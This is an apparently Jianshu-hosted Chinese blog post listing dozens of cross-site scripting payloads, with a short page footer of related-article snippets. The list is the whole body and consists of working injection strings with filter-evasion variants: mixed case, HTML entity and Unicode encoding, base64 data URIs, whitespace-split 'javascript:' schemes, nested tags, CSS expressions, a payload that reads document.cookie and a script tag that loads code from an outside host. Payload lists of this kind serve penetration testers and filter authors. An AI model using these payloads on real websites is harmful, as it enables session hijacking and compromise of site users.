XSS的一些payload

";alert(1);//xx


¼script¾alert(¢XSS¢)¼/script¾   //US-ASCII编码,如Tomcat

<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>    //IE7以下
<![endif]-->

</title><script>alert(1);</script>



<a href="javascript:alert(1)">aaaa</a>
<a href="JavaSCript:alealertrt%25281%2529">aaaa</a>
<a onclick=alert(1)>XSS</a>
<a onmouseover=alert(1)>XSS</a>


<body onload=alert(1)>  //无需js标签,可直接执行
<body background="javascript:alert('XSS')">  //IE7以下


<DIV style="background-image: url(javascript:alert('XSS'))">  //IE7以下
<DIV style="width: expression(alert('XSS'));">


<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" allowscriptaccess="always"></embed>  //Firefox/Chrome



<iframe src="javascript:alert(1)"></iframe>
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>    //Firefox/Chrome/Safari
<iframe src=# onmouseover="alert(document.cookie)"></iframe>



'"><img onmouseover=alert(1)>  //IE
<img onmouseover=alert(1) src>  //IE
<img src=x onmouseover=alert(1)>
<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=1 alt=al lang=ert onerror=top[url=1]alt+lang[/url]>
// 下面的img标签都是在IE7以下版本生效
<img src=JaVaScRiPt:alert(1)>
<img src=javascript:alert(String.fromCharCode(49))>
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<img src=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<img src="jav   ascript:alert('XSS')">  <!-- 这里空格是tab -->
<img src="jav&#x09;ascript:alert('XSS');"> <!-- &#x09;是tab -->
<img src="jav&#x0D;ascript:alert('XSS');"> <!-- &#x0D;是回车 -->
<img src=" &#14;  javascript:alert('XSS');">
<img DYNsrc="javascript:alert('XSS')">
<img LOWsrc="javascript:alert('XSS')">
<img src=`javascript:alert('xxxxx')`>
<img src='vbscript:msgbox("XSS")'>



<input type=image src=x onerror=alert(1)>
<input type="IMAGE" src="javascript:alert('XSS');"> //IE7以下


<link rel="stylesheet" href="javascript:alert('XSS');">  //IE7以下

<meta http-equiv="refresh" content="x;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">  //Firefox


<script>alert(1)</script>
<sCrIpt>alert(1)</ScRipt>
<sCrsCrIptIpt>alalertert(1)</ScRsCrIptipt>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>window[url=0]'alert'[/url]</script>
<script>parent[url=1]'alert'[/url]</script>
<script>self[url=2]'alert'[/url]</script>
<script>top[url=3]'alert'[/url]</script>
<script src=http://www.xss.com/1.js></script>
[quote]</script>">'><script>alert(String.fromCharCode(49))</script>
<<SCRIPT>alert(1);//<</SCRIPT>[/quote]



<style>li{list-style-image: url("javascript:alert('XSS')");}</style><ul><li>XSS</br>  //IE7以下
<style>a{width:expression(alert('11'))}</style><a href="x"></a>  //IE7以下
<style>.xss{background-image:url("javascript:alert('XSS')");}</style><a class=xss></a>  //IE7以下
<style type="text/css">BODY{background:url("javascript:alert('XSS')");}</style>  //IE7以下


<svg/onload=alert(1)>


<table BACKGROUND="javascript:alert('XSS')">  //IE7以下
<table><TD BACKGROUND="javascript:alert('XSS')">  //IE7以下
<div style="background-image: url(javascript:alert('XSS'));">  //IE7以下
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,001评论 19 139
  • 之前积累了XSS 有一段时间,因为目前开始了一件有趣的工程,需要整合非常多的知识,其中Web 安全这一块出现最多的...
    刀背藏身阅读 9,272评论 0 16
  • 前段时间在学习Web安全方面的知识,对这方面有了进一步的了解,决定写文章记录下来,只是对Web安全方面知识的一些总...
    邱振源的博客阅读 1,286评论 0 1
  • 客户端(浏览器)安全 同源策略(Same Origin Policy) 同源策略阻止从一个源加载的文档或脚本获取或...
    人在码途阅读 1,809评论 0 8
  • 补充句子~ 当我满足父母的时候我是 当我满足父母的时候我是 当我满足父母的时候我是 当我满足孩子的时候我是 当我满...
    海霞OH卡咨询师阅读 182评论 0 0